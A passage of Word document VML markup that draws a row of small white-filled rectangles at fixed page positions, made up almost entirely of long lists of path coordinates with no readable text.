12,9511,6912,9510,6912,9509,6912,9508,6912,9506,6912,9505,6912,9504,6912,9502,6912,9501,6912,9500,6912,9498,6912,9497,6912,9495,6912,9493,6912,9492,6912,9490,6912,9489,6912,9487,6912,9485,6912,9483,6912,9481,6912,9480,6912,9478,6912,9476,6912,9474,6912,9472,6912,9470,6912,9468,6912,9465,6912,9463,6912,9461,6912,9459,6912,9456,6912,9454,6912,9452,6912,9449,6912,9447,6912,9444,6912,9441,6912,9439,6912,9436,6912,9433,6912,9430,6912,9428,6912,9425,6912,9422,6912,9419,6912,9419,6912,9419,6912,9419,6912,9419,6912,9419,6912,9419,6912,9419,6912,9419,6912,9419,6912,9419,6912,9419,6912,9419,6912,9419,6912,9419,6912,9419,6912,9419,6912,9419,6912,9419,6912,9419,6912,9419,6911,9419,6911,9419,6911,9419,6911,9419,6911,9419,6910,9419,6910,9419,6910,9419,6910,9419,6909,9419,6909,9419,6908,9419,6908,9419,6908,9419,6907,9419,6907,9419,6906,9419,6905,9419,6905,9419,6904,9419,6904,9419,6903,9419,6902,9419,6901,9419,6900,9419,6900,9419,6899,9419,6898,9419,6897,9419,6896,9419,6895,9419,6894,9419,6892,9419,6891,9419,6890,9419,6889,9419,6887,9419,6886,9419,6884,9419,6883,9419,6881,9419,6880,9419,6878,9419,6876,9419,6875,9419,6873,9419,6871,9419,6869,9419,6867,9419,6865,9419,6863,9419,6861,9419,6858,9419,6856,9419,6854,9419,6851,9419,6849,9419,6846,9419,6843,9419,6841,9419,6838,9419,6835,9419,6832,9419,6829,9419,6826,9419,6823,9419,6820,9419,6816,9419,6813,9419,6809,9419,6806,9419,6802,9419,6798,9419,6795,9419,6791,9419,6787,9419,6783,9419,6779,9419,6774,9419,6770,9419,6766,9419,6761,9419,6756,9419,6752,9419,6747,9419,6742,9419,6737,9419,6732,9419,6727,9419,6722,9419,6716,9419,6711,9419,6705,9419,6700,9419,6694,9419,6688,9419,6682,9419,6676,9419,6670,9419,6664,9419,6657e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:85.500pt;margin-top:345.500pt;width:12.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1710,6910" coordsize="250,270">
        <v:shape style="position:absolute;left:1710;top:6910;width:250;height:270" coordorigin="1710,6910" coordsize="250,270" path="m1720,6927l1720,6927,1720,6927,1720,6927,1720,6927,1720,6927,1720,6927,1720,6927,1720,6927,1720,6927,1720,6927,1720,6927,1720,6927,1720,6927,1720,6927,1720,6927,1720,6927,1720,6927,1721,6927,1721,6927,1721,6927,1721,6927,1721,6927,1721,6927,1722,6927,1722,6927,1722,6927,1722,6927,1723,6927,1723,6927,1723,6927,1724,6927,1724,6927,1725,6927,1725,6927,1725,6927,1726,6927,1727,6927,1727,6927,1728,6927,1728,6927,1729,6927,1730,6927,1730,6927,1731,6927,1732,6927,1733,6927,1734,6927,1735,6927,1736,6927,1737,6927,1738,6927,1739,6927,1740,6927,1741,6927,1742,6927,1744,6927,1745,6927,1746,6927,1748,6927,1749,6927,1751,6927,1752,6927,1754,6927,1755,6927,1757,6927,1759,6927,1761,6927,1763,6927,1765,6927,1767,6927,1769,6927,1771,6927,1773,6927,1775,6927,1778,6927,1780,6927,1782,6927,1785,6927,1787,6927,1790,6927,1793,6927,1796,6927,1798,6927,1801,6927,1804,6927,1807,6927,1810,6927,1814,6927,1817,6927,1820,6927,1824,6927,1827,6927,1831,6927,1834,6927,1838,6927,1842,6927,1846,6927,1850,6927,1854,6927,1858,6927,1862,6927,1867,6927,1871,6927,1876,6927,1880,6927,1885,6927,1890,6927,1894,6927,1899,6927,1904,6927,1910,6927,1915,6927,1920,6927,1925,6927,1931,6927,1937,6927,1942,6927,1948,6927,1954,6927,1960,6927,1960,6927,1960,6927,1960,6927,1960,6927,1960,6927,1960,6928,1960,6928,1960,6928,1960,6928,1960,6928,1960,6928,1960,6928,1960,6928,1960,6928,1960,6928,1960,6928,1960,6928,1960,6928,1960,6928,1960,6929,1960,6929,1960,6929,1960,6929,1960,6929,1960,6930,1960,6930,1960,6930,1960,6930,1960,6931,1960,6931,1960,6932,1960,6932,1960,6932,1960,6933,1960,6933,1960,6934,1960,6935,1960,6935,1960,6936,1960,6936,1960,6937,1960,6938,1960,6939,1960,6940,1960,6940,1960,6941,1960,6942,1960,6943,1960,6944,1960,6945,1960,6946,1960,6948,1960,6949,1960,6950,1960,6951,1960,6953,1960,6954,1960,6956,1960,6957,1960,6959,1960,6960,1960,6962,1960,6964,1960,6965,1960,6967,1960,6969,1960,6971,1960,6973,1960,6975,1960,6977,1960,6979,1960,6982,1960,6984,1960,6986,1960,6989,1960,6991,1960,6994,1960,6997,1960,6999,1960,7002,1960,7005,1960,7008,1960,7011,1960,7014,1960,7017,1960,7020,1960,7024,1960,7027,1960,7031,1960,7034,1960,7038,1960,7042,1960,7045,1960,7049,1960,7053,1960,7057,1960,7061,1960,7066,1960,7070,1960,7074,1960,7079,1960,7083,1960,7088,1960,7093,1960,7098,1960,7103,1960,7108,1960,7113,1960,7118,1960,7124,1960,7129,1960,7135,1960,7140,1960,7146,1960,7152,1960,7158,1960,7164,1960,7170,1960,7176,1960,7183,1960,7183,1960,7183,1960,7183,1960,7183,1960,7183,1960,7183,1960,7183,1960,7183,1960,7183,1960,7183,1960,7183,1960,7183,1960,7183,1960,7183,1960,7183,1960,7183,1959,7183,1959,7183,1959,7183,1959,7183,1959,7183,1959,7183,1958,7183,1958,7183,1958,7183,1958,7183,1957,7183,1957,7183,1957,7183,1957,7183,1956,7183,1956,7183,1955,7183,1955,7183,1954,7183,1954,7183,1953,7183,1953,7183,1952,7183,1952,7183,1951,7183,1950,7183,1949,7183,1949,7183,1948,7183,1947,7183,1946,7183,1945,7183,1944,7183,1943,7183,1942,7183,1941,7183,1940,7183,1939,7183,1938,7183,1936,7183,1935,7183,1934,7183,1932,7183,1931,7183,1929,7183,1928,7183,1926,7183,1924,7183,1923,7183,1921,7183,1919,7183,1917,7183,1915,7183,1913,7183,1911,7183,1909,7183,1907,7183,1905,7183,1902,7183,1900,7183,1897,7183,1895,7183,1892,7183,1890,7183,1887,7183,1884,7183,1881,7183,1879,7183,1876,7183,1872,7183,1869,7183,1866,7183,1863,7183,1860,7183,1856,7183,1853,7183,1849,7183,1845,7183,1842,7183,1838,7183,1834,7183,1830,7183,1826,7183,1822,7183,1817,7183,1813,7183,1809,7183,1804,7183,1800,7183,1795,7183,1790,7183,1785,7183,1780,7183,1775,7183,1770,7183,1765,7183,1760,7183,1754,7183,1749,7183,1743,7183,1738,7183,1732,7183,1726,7183,1720,7183,1720,7183,1720,7183,1720,7183,1720,7183,1720,7183,1720,7183,1720,7183,1720,7183,1720,7183,1720,7183,1720,7182,1720,7182,1720,7182,1720,7182,1720,7182,1720,7182,1720,7182,1720,7182,1720,7182,1720,7182,1720,7181,1720,7181,1720,7181,1720,7181,1720,7181,1720,7180,1720,7180,1720,7180,1720,7179,1720,7179,1720,7179,1720,7178,1720,7178,1720,7177,1720,7177,1720,7176,1720,7176,1720,7175,1720,7174,1720,7174,1720,7173,1720,7172,1720,7171,1720,7171,1720,7170,1720,7169,1720,7168,1720,7167,1720,7166,1720,7165,1720,7164,1720,7163,1720,7161,1720,7160,1720,7159,1720,7157,1720,7156,1720,7155,1720,7153,1720,7152,1720,7150,1720,7148,1720,7147,1720,7145,1720,7143,1720,7141,1720,7139,1720,7137,1720,7135,1720,7133,1720,7131,1720,7128,1720,7126,1720,7124,1720,7121,1720,7119,1720,7116,1720,7114,1720,7111,1720,7108,1720,7105,1720,7102,1720,7099,1720,7096,1720,7093,1720,7090,1720,7086,1720,7083,1720,7079,1720,7076,1720,7072,1720,7069,1720,7065,1720,7061,1720,7057,1720,7053,1720,7049,1720,7044,1720,7040,1720,7036,1720,7031,1720,7027,1720,7022,1720,7017,1720,7012,1720,7007,1720,7002,1720,6997,1720,6992,1720,6987,1720,6981,1720,6976,1720,6970,1720,6964,1720,6958,1720,6952,1720,6946,1720,6940,1720,6934,1720,6927e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:97.500pt;margin-top:345.500pt;width:12.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1950,6910" coordsize="250,270">
        <v:shape style="position:absolute;left:1950;top:6910;width:250;height:270" coordorigin="1950,6910" coordsize="250,270" path="m1960,6927l1960,6927,1960,6927,1960,6927,1960,6927,1960,6927,1960,6927,1960,6927,1960,6927,1960,6927,1960,6927,1960,6927,1960,6927,1960,6927,1960,6927,1960,6927,1960,6927,1961,6927,1961,6927,1961,6927,1961,6927,1961,6927,1961,6927,1962,6927,1962,6927,1962,6927,1962,6927,1962,6927,1963,6927,1963,6927,1963,6927,1964,6927,1964,6927,1965,6927,1965,6927,1966,6927,1966,6927,1967,6927,1967,6927,1968,6927,1968,6927,1969,6927,1970,6927,1971,6927,1971,6927,1972,6927,1973,6927,1974,6927,1975,6927,1976,6927,1977,6927,1978,6927,1979,6927,1980,6927,1981,6927,1982,6927,1984,6927,1985,6927,1986,6927,1988,6927,1989,6927,1991,6927,1992,6927,1994,6927,1996,6927,1997,6927,1999,6927,2001,6927,2003,6927,2005,6927,2007,6927,2009,6927,2011,6927,2013,6927,2015,6927,2018,6927,2020,6927,2023,6927,2025,6927,2028,6927,2030,6927,2033,6927,2036,6927,2039,6927,2041,6927,2044,6927,2047,6927,2051,6927,2054,6927,2057,6927,2060,6927,2064,6927,2067,6927,2071,6927,2075,6927,2078,6927,2082,6927,2086,6927,2090,6927,2094,6927,2098,6927,2102,6927,2107,6927,2111,6927,2116,6927,2120,6927,2125,6927,2130,6927,2135,6927,2139,6927,2145,6927,2150,6927,2155,6927,2160,6927,2166,6927,2171,6927,2177,6927,2182,6927,2188,6927,2194,6927,2200,6927,2200,6927,2200,6927,2200,6927,2200,6927,2200,6927,2200,6928,2200,6928,2200,6928,2200,6928,2200,6928,2200,6928,2200,6928,2200,6928,2200,6928,2200,6928,2200,6928,2200,6928,2200,6928,2200,6928,2200,6929,2200,6929,2200,6929,2200,6929,2200,6929,2200,6930,2200,6930,2200,6930,2200,6930,2200,6931,2200,6931,2200,6932,2200,6932,2200,6932,2200,6933,2200,6933,2200,6934,2200,6935,2200,6935,2200,6936,2200,6936,2200,6937,2200,6938,2200,6939,2200,6940,2200,6940,2200,6941,2200,6942,2200,6943,2200,6944,2200,6945,2200,6946,2200,6948,2200,6949,2200,6950,2200,6951,2200,6953,2200,6954,2200,6956,2200,6957,2200,6959,2200,6960,2200,6962,2200,6964,2200,6965,2200,6967,2200,6969,2200,6971,2200,6973,2200,6975,2200,6977,2200,6979,2200,6982,2200,6984,2200,6986,2200,6989,2200,6991,2200,6994,2200,6997,2200,6999,2200,7002,2200,7005,2200,7008,2200,7011,2200,7014,2200,7017,2200,7020,2200,7024,2200,7027,2200,7031,2200,7034,2200,7038,2200,7042,2200,7045,2200,7049,2200,7053,2200,7057,2200,7061,2200,7066,2200,7070,2200,7074,2200,7079,2200,7083,2200,7088,2200,7093,2200,7098,2200,7103,2200,7108,2200,7113,2200,7118,2200,7124,2200,7129,2200,7135,2200,7140,2200,7146,2200,7152,2200,7158,2200,7164,2200,7170,2200,7176,2200,7183,2200,7183,2200,7183,2200,7183,2200,7183,2200,7183,2200,7183,2200,7183,2200,7183,2200,7183,2200,7183,2200,7183,2200,7183,2200,7183,2200,7183,2200,7183,2200,7183,2200,7183,2199,7183,2199,7183,2199,7183,2199,7183,2199,7183,2199,7183,2198,7183,2198,7183,2198,7183,2198,7183,2197,7183,2197,7183,2197,7183,2196,7183,2196,7183,2195,7183,2195,7183,2195,7183,2194,7183,2193,7183,2193,7183,2192,7183,2192,7183,2191,7183,2190,7183,2190,7183,2189,7183,2188,7183,2187,7183,2186,7183,2185,7183,2184,7183,2183,7183,2182,7183,2181,7183,2180,7183,2179,7183,2178,7183,2176,7183,2175,7183,2174,7183,2172,7183,2171,7183,2169,7183,2168,7183,2166,7183,2164,7183,2163,7183,2161,7183,2159,7183,2157,7183,2155,7183,2153,7183,2151,7183,2149,7183,2147,7183,2145,7183,2142,7183,2140,7183,2138,7183,2135,7183,2132,7183,2130,7183,2127,7183,2124,7183,2122,7183,2119,7183,2116,7183,2113,7183,2109,7183,2106,7183,2103,7183,2100,7183,2096,7183,2093,7183,2089,7183,2085,7183,2082,7183,2078,7183,2074,7183,2070,7183,2066,7183,2062,7183,2058,7183,2053,7183,2049,7183,2044,7183,2040,7183,2035,7183,2030,7183,2026,7183,2021,7183,2016,7183,2010,7183,2005,7183,2000,7183,1995,7183,1989,7183,1983,7183,1978,7183,1972,7183,1966,7183,1960,7183,1960,7183,1960,7183,1960,7183,1960,7183,1960,7183,1960,7183,1960,7183,1960,7183,1960,7183,1960,7183,1960,7182,1960,7182,1960,7182,1960,7182,1960,7182,1960,7182,1960,7182,1960,7182,1960,7182,1960,7182,1960,7181,1960,7181,1960,7181,1960,7181,1960,7181,1960,7180,1960,7180,1960,7180,1960,7179,1960,7179,1960,7179,1960,7178,1960,7178,1960,7177,1960,7177,1960,7176,1960,7176,1960,7175,1960,7174,1960,7174,1960,7173,1960,7172,1960,7171,1960,7171,1960,7170,1960,7169,1960,7168,1960,7167,1960,7166,1960,7165,1960,7164,1960,7163,1960,7161,1960,7160,1960,7159,1960,7157,1960,7156,1960,7155,1960,7153,1960,7152,1960,7150,1960,7148,1960,7147,1960,7145,1960,7143,1960,7141,1960,7139,1960,7137,1960,7135,1960,7133,1960,7131,1960,7128,1960,7126,1960,7124,1960,7121,1960,7119,1960,7116,1960,7114,1960,7111,1960,7108,1960,7105,1960,7102,1960,7099,1960,7096,1960,7093,1960,7090,1960,7086,1960,7083,1960,7079,1960,7076,1960,7072,1960,7069,1960,7065,1960,7061,1960,7057,1960,7053,1960,7049,1960,7044,1960,7040,1960,7036,1960,7031,1960,7027,1960,7022,1960,7017,1960,7012,1960,7007,1960,7002,1960,6997,1960,6992,1960,6987,1960,6981,1960,6976,1960,6970,1960,6964,1960,6958,1960,6952,1960,6946,1960,6940,1960,6934,1960,6927e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:109.500pt;margin-top:345.500pt;width:12.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2190,6910" coordsize="250,270">
        <v:shape style="position:absolute;left:2190;top:6910;width:250;height:270" coordorigin="2190,6910" coordsize="250,270" path="m2200,6927l2200,6927,2200,6927,2200,6927,2200,6927,2200,6927,2200,6927,2200,6927,2200,6927,2200,6927,2200,6927,2200,6927,2200,6927,2200,6927,2200,6927,2200,6927,2201,6927,2201,6927,2201,6927,2201,6927,2201,6927,2201,6927,2201,6927,2202,6927,2202,6927,2202,6927,2202,6927,2203,6927,2203,6927,2203,6927,2204,6927,2204,6927,2204,6927,2205,6927,2205,6927,2206,6927,2206,6927,2207,6927,2207,6927,2208,6927,2209,6927,2209,6927,2210,6927,2211,6927,2211,6927,2212,6927,2213,6927,2214,6927,2215,6927,2216,6927,2217,6927,2218,6927,2219,6927,2220,6927,2221,6927,2223,6927,2224,6927,2225,6927,2226,6927,2228,6927,2229,6927,2231,6927,2232,6927,2234,6927,2236,6927,2237,6927,2239,6927,2241,6927,2243,6927,2245,6927,2247,6927,2249,6927,2251,6927,2253,6927,2256,6927,2258,6927,2260,6927,2263,6927,2265,6927,2268,6927,2270,6927,2273,6927,2276,6927,2279,6927,2282,6927,2285,6927,2288,6927,2291,6927,2294,6927,2297,6927,2301,6927,2304,6927,2307,6927,2311,6927,2315,6927,2318,6927,2322,6927,2326,6927,2330,6927,2334,6927,2338,6927,2343,6927,2347,6927,2351,6927,2356,6927,2360,6927,2365,6927,2370,6927,2375,6927,2380,6927,2385,6927,2390,6927,2395,6927,2400,6927,2406,6927,2411,6927,2417,6927,2423,6927,2428,6927,2434,6927,2440,6927,2440,6927,2440,6927,2440,6927,2440,6927,2440,6927,2440,6928,2440,6928,2440,6928,2440,6928,2440,6928,2440,6928,2440,6928,2440,6928,2440,6928,2440,6928,2440,6928,2440,6928,2440,6928,2440,6928,2440,6929,2440,6929,2440,6929,2440,6929,2440,6929,2440,6930,2440,6930,2440,6930,2440,6930,2440,6931,2440,6931,2440,6932,2440,6932,2440,6932,2440,6933,2440,6933,2440,6934,2440,6935,2440,6935,2440,6936,2440,6936,2440,6937,2440,6938,2440,6939,2440,6940,2440,6940,2440,6941,2440,6942,2440,6943,2440,6944,2440,6945,2440,6946,2440,6948,2440,6949,2440,6950,2440,6951,2440,6953,2440,6954,2440,6956,2440,6957,2440,6959,2440,6960,2440,6962,2440,6964,2440,6965,2440,6967,2440,6969,2440,6971,2440,6973,2440,6975,2440,6977,2440,6979,2440,6982,2440,6984,2440,6986,2440,6989,2440,6991,2440,6994,2440,6997,2440,6999,2440,7002,2440,7005,2440,7008,2440,7011,2440,7014,2440,7017,2440,7020,2440,7024,2440,7027,2440,7031,2440,7034,2440,7038,2440,7042,2440,7045,2440,7049,2440,7053,2440,7057,2440,7061,2440,7066,2440,7070,2440,7074,2440,7079,2440,7083,2440,7088,2440,7093,2440,7098,2440,7103,2440,7108,2440,7113,2440,7118,2440,7124,2440,7129,2440,7135,2440,7140,2440,7146,2440,7152,2440,7158,2440,7164,2440,7170,2440,7176,2440,7183,2440,7183,2440,7183,2440,7183,2440,7183,2440,7183,2440,7183,2440,7183,2440,7183,2440,7183,2440,7183,2440,7183,2440,7183,2440,7183,2440,7183,2440,7183,2440,7183,2440,7183,2440,7183,2439,7183,2439,7183,2439,7183,2439,7183,2439,7183,2438,7183,2438,7183,2438,7183,2438,7183,2437,7183,2437,7183,2437,7183,2436,7183,2436,7183,2436,7183,2435,7183,2435,7183,2434,7183,2434,7183,2433,7183,2432,7183,2432,7183,2431,7183,2430,7183,2430,7183,2429,7183,2428,7183,2427,7183,2426,7183,2425,7183,2424,7183,2423,7183,2422,7183,2421,7183,2420,7183,2419,7183,2418,7183,2417,7183,2415,7183,2414,7183,2412,7183,2411,7183,2409,7183,2408,7183,2406,7183,2405,7183,2403,7183,2401,7183,2399,7183,2397,7183,2395,7183,2393,7183,2391,7183,2389,7183,2387,7183,2385,7183,2382,7183,2380,7183,2378,7183,2375,7183,2373,7183,2370,7183,2367,7183,2365,7183,2362,7183,2359,7183,2356,7183,2353,7183,2350,7183,2346,7183,2343,7183,2340,7183,2336,7183,2333,7183,2329,7183,2326,7183,2322,7183,2318,7183,2314,7183,2310,7183,2306,7183,2302,7183,2298,7183,2293,7183,2289,7183,2285,7183,2280,7183,2275,7183,2271,7183,2266,7183,2261,7183,2256,7183,2251,7183,2245,7183,2240,7183,2235,7183,2229,7183,2224,7183,2218,7183,2212,7183,2206,7183,2200,7183,2200,7183,2200,7183,2200,7183,2200,7183,2200,7183,2200,7183,2200,7183,2200,7183,2200,7183,2200,7183,2200,7182,2200,7182,2200,7182,2200,7182,2200,7182,2200,7182,2200,7182,2200,7182,2200,7182,2200,7182,2200,7181,2200,7181,2200,7181,2200,7181,2200,7181,2200,7180,2200,7180,2200,7180,2200,7179,2200,7179,2200,7179,2200,7178,2200,7178,2200,7177,2200,7177,2200,7176,2200,7176,2200,7175,2200,7174,2200,7174,2200,7173,2200,7172,2200,7171,2200,7171,2200,7170,2200,7169,2200,7168,2200,7167,2200,7166,2200,7165,2200,7164,2200,7163,2200,7161,2200,7160,2200,7159,2200,7157,2200,7156,2200,7155,2200,7153,2200,7152,2200,7150,2200,7148,2200,7147,2200,7145,2200,7143,2200,7141,2200,7139,2200,7137,2200,7135,2200,7133,2200,7131,2200,7128,2200,7126,2200,7124,2200,7121,2200,7119,2200,7116,2200,7114,2200,7111,2200,7108,2200,7105,2200,7102,2200,7099,2200,7096,2200,7093,2200,7090,2200,7086,2200,7083,2200,7079,2200,7076,2200,7072,2200,7069,2200,7065,2200,7061,2200,7057,2200,7053,2200,7049,2200,7044,2200,7040,2200,7036,2200,7031,2200,7027,2200,7022,2200,7017,2200,7012,2200,7007,2200,7002,2200,6997,2200,6992,2200,6987,2200,6981,2200,6976,2200,6970,2200,6964,2200,6958,2200,6952,2200,6946,2200,6940,2200,6934,2200,6927e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:121.500pt;margin-top:345.500pt;width:12.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2430,6910" coordsize="250,270">
        <v:shape style="position:absolute;left:2430;top:6910;width:250;height:270" coordorigin="2430,6910" coordsize="250,270" path="m2440,6927l2440,6927,2440,6927,2440,6927,2440,6927,2440,6927,2440,6927,2440,6927,2440,6927,2440,6927,2440,6927,2440,6927,2440,6927,2440,6927,2441,6927,2441,6927,2441,6927,2441,6927,2441,6927,2441,6927,2441,6927,2441,6927,2442,6927,2442,6927,2442,6927,2442,6927,2442,6927,2443,6927,2443,6927,2443,6927,2444,6927,2444,6927,2444,6927,2445,6927,2445,6927,2446,6927,2446,6927,2447,6927,2447,6927,2448,6927,2449,6927,2449,6927,2450,6927,2451,6927,2452,6927,2452,6927,2453,6927,2454,6927,2455,6927,2456,6927,2457,6927,2458,6927,2459,6927,2460,6927,2461,6927,2463,6927,2464,6927,2465,6927,2467,6927,2468,6927,2469,6927,2471,6927,2473,6927,2474,6927,2476,6927,2478,6927,2479,6927,2481,6927,2483,6927,2485,6927,2487,6927,2489,6927,2491,6927,2493,6927,2496,6927,2498,6927,2500,6927,2503,6927,2505,6927,2508,6927,2510,6927,2513,6927,2516,6927,2519,6927,2522,6927,2525,6927,2528,6927,2531,6927,2534,6927,2537,6927,2541,6927,2544,6927,2548,6927,2551,6927,2555,6927,2559,6927,2562,6927,2566,6927,2570,6927,2574,6927,2578,6927,2583,6927,2587,6927,2591,6927,2596,6927,2601,6927,2605,6927,2610,6927,2615,6927,2620,6927,2625,6927,2630,6927,2635,6927,2640,6927,2646,6927,2651,6927,2657,6927,2663,6927,2668,6927,2674,6927,2680,6927,2680,6927,2680,6927,2680,6927,2680,6927,2680,6927,2680,6928,2680,6928,2680,6928,2680,6928,2680,6928,2680,6928,2680,6928,2680,6928,2680,6928,2680,6928,2680,6928,2680,6928,2680,6928,2680,6928,2680,6929,2680,6929,2680,6929,2680,6929,2680,6929,2680,6930,2680,6930,2680,6930,2680,6930,2680,6931,2680,6931,2680,6932,2680,6932,2680,6932,2680,6933,2680,6933,2680,6934,2680,6935,2680,6935,2680,6936,2680,6936,2680,6937,2680,6938,2680,6939,2680,6940,2680,6940,2680,6941,2680,6942,2680,6943,2680,6944,2680,6945,2680,6946,2680,6948,2680,6949,2680,6950,2680,6951,2680,6953,2680,6954,2680,6956,2680,6957,2680,6959,2680,6960,2680,6962,2680,6964,2680,6965,2680,6967,2680,6969,2680,6971,2680,6973,2680,6975,2680,6977,2680,6979,2680,6982,2680,6984,2680,6986,2680,6989,2680,6991,2680,6994,2680,6997,2680,6999,2680,7002,2680,7005,2680,7008,2680,7011,2680,7014,2680,7017,2680,7020,2680,7024,2680,7027,2680,7031,2680,7034,2680,7038,2680,7042,2680,7045,2680,7049,2680,7053,2680,7057,2680,7061,2680,7066,2680,7070,2680,7074,2680,7079,2680,7083,2680,7088,2680,7093,2680,7098,2680,7103,2680,7108,2680,7113,2680,7118,2680,7124,2680,7129,2680,7135,2680,7140,2680,7146,2680,7152,2680,7158,2680,7164,2680,7170,2680,7176,2680,7183,2680,7183,2680,7183,2680,7183,2680,7183,2680,7183,2680,7183,2680,7183,2680,7183,2680,7183,2680,7183,2680,7183,2680,7183,2680,7183,2680,7183,2680,7183,2680,7183,2680,7183,2680,7183,2680,7183,2679,7183,2679,7183,2679,7183,2679,7183,2679,7183,2678,7183,2678,7183,2678,7183,2678,7183,2677,7183,2677,7183,2677,7183,2676,7183,2676,7183,2675,7183,2675,7183,2674,7183,2674,7183,2673,7183,2673,7183,2672,7183,2671,7183,2671,7183,2670,7183,2669,7183,2668,7183,2667,7183,2666,7183,2666,7183,2665,7183,2664,7183,2663,7183,2661,7183,2660,7183,2659,7183,2658,7183,2657,7183,2655,7183,2654,7183,2653,7183,2651,7183,2650,7183,2648,7183,2646,7183,2645,7183,2643,7183,2641,7183,2639,7183,2637,7183,2636,7183,2634,7183,2631,7183,2629,7183,2627,7183,2625,7183,2623,7183,2620,7183,2618,7183,2615,7183,2613,7183,2610,7183,2607,7183,2605,7183,2602,7183,2599,7183,2596,7183,2593,7183,2590,7183,2587,7183,2583,7183,2580,7183,2576,7183,2573,7183,2569,7183,2566,7183,2562,7183,2558,7183,2554,7183,2550,7183,2546,7183,2542,7183,2538,7183,2534,7183,2529,7183,2525,7183,2520,7183,2515,7183,2511,7183,2506,7183,2501,7183,2496,7183,2491,7183,2485,7183,2480,7183,2475,7183,2469,7183,2464,7183,2458,7183,2452,7183,2446,7183,2440,7183,2440,7183,2440,7183,2440,7183,2440,7183,2440,7183,2440,7183,2440,7183,2440,7183,2440,7183,2440,7183,2440,7182,2440,7182,2440,7182,2440,7182,2440,7182,2440,7182,2440,7182,2440,7182,2440,7182,2440,7182,2440,7181,2440,7181,2440,7181,2440,7181,2440,7181,2440,7180,2440,7180,2440,7180,2440,7179,2440,7179,2440,7179,2440,7178,2440,7178,2440,7177,2440,7177,2440,7176,2440,7176,2440,7175,2440,7174,2440,7174,2440,7173,2440,7172,2440,7171,2440,7171,2440,7170,2440,7169,2440,7168,2440,7167,2440,7166,2440,7165,2440,7164,2440,7163,2440,7161,2440,7160,2440,7159,2440,7157,2440,7156,2440,7155,2440,7153,2440,7152,2440,7150,2440,7148,2440,7147,2440,7145,2440,7143,2440,7141,2440,7139,2440,7137,2440,7135,2440,7133,2440,7131,2440,7128,2440,7126,2440,7124,2440,7121,2440,7119,2440,7116,2440,7114,2440,7111,2440,7108,2440,7105,2440,7102,2440,7099,2440,7096,2440,7093,2440,7090,2440,7086,2440,7083,2440,7079,2440,7076,2440,7072,2440,7069,2440,7065,2440,7061,2440,7057,2440,7053,2440,7049,2440,7044,2440,7040,2440,7036,2440,7031,2440,7027,2440,7022,2440,7017,2440,7012,2440,7007,2440,7002,2440,6997,2440,6992,2440,6987,2440,6981,2440,6976,2440,6970,2440,6964,2440,6958,2440,6952,2440,6946,2440,6940,2440,6934,2440,6927e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:133.500pt;margin-top:345.500pt;width:12.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2670,6910" coordsize="250,270">
        <v:shape style="position:absolute;left:2670;top:6910;width:250;height:270" coordorigin="2670,6910" coordsize="250,270" path="m2680,6927l2680,6927,2680,6927,2680,6927,2680,6927,2680,6927,2680,6927,2680,6927,2680,6927,2680,6927,2680,6927,2680,6927,2681,6927,2681,6927,2681,6927,2681,6927,2681,6927,2681,6927,2681,6927,2681,6927,2681,6927,2681,6927,2682,6927,2682,6927,2682,6927,2682,6927,2683,6927,2683,6927,2683,6927,2683,6927,2684,6927,2684,6927,2685,6927,2685,6927,2685,6927,2686,6927,2686,6927,2687,6927,2688,6927,2688,6927,2689,6927,2689,6927,2690,6927,2691,6927,2692,6927,2692,6927,2693,6927,2694,6927,2695,6927,2696,6927,2697,6927,2698,6927,2699,6927,2700,6927,2702,6927,2703,6927,2704,6927,2705,6927,2707,6927,2708,6927,2710,6927,2711,6927,2713,6927,2714,6927,2716,6927,2718,6927,2719,6927,2721,6927,2723,6927,2725,6927,2727,6927,2729,6927,2731,6927,2734,6927,2736,6927,2738,6927,2740,6927,2743,6927,2745,6927,2748,6927,2751,6927,2753,6927,2756,6927,2759,6927,2762,6927,2765,6927,2768,6927,2771,6927,2774,6927,2777,6927,2781,6927,2784,6927,2788,6927,2791,6927,2795,6927,2799,6927,2803,6927,2806,6927,2810,6927,2814,6927,2819,6927,2823,6927,2827,6927,2832,6927,2836,6927,2841,6927,2845,6927,2850,6927,2855,6927,2860,6927,2865,6927,2870,6927,2875,6927,2881,6927,2886,6927,2891,6927,2897,6927,2903,6927,2909,6927,2914,6927,2920,6927,2920,6927,2920,6927,2920,6927,2920,6927,2920,6927,2920,6928,2920,6928,2920,6928,2920,6928,2920,6928,2920,6928,2920,6928,2920,6928,2920,6928,2920,6928,2920,6928,2920,6928,2920,6928,2920,6928,2920,6929,2920,6929,2920,6929,2920,6929,2920,6929,2920,6930,2920,6930,2920,6930,2920,6930,2920,6931,2920,6931,2920,6932,2920,6932,2920,6932,2920,6933,2920,6933,2920,6934,2920,6935,2920,6935,2920,6936,2920,6936,2920,6937,2920,6938,2920,6939,2920,6940,2920,6940,2920,6941,2920,6942,2920,6943,2920,6944,2920,6945,2920,6946,2920,6948,2920,6949,2920,6950,2920,6951,2920,6953,2920,6954,2920,6956,2920,6957,2920,6959,2920,6960,2920,6962,2920,6964,2920,6965,2920,6967,2920,6969,2920,6971,2920,6973,2920,6975,2920,6977,2920,6979,2920,6982,2920,6984,2920,6986,2920,6989,2920,6991,2920,6994,2920,6997,2920,6999,2920,7002,2920,7005,2920,7008,2920,7011,2920,7014,2920,7017,2920,7020,2920,7024,2920,7027,2920,7031,2920,7034,2920,7038,2920,7042,2920,7045,2920,7049,2920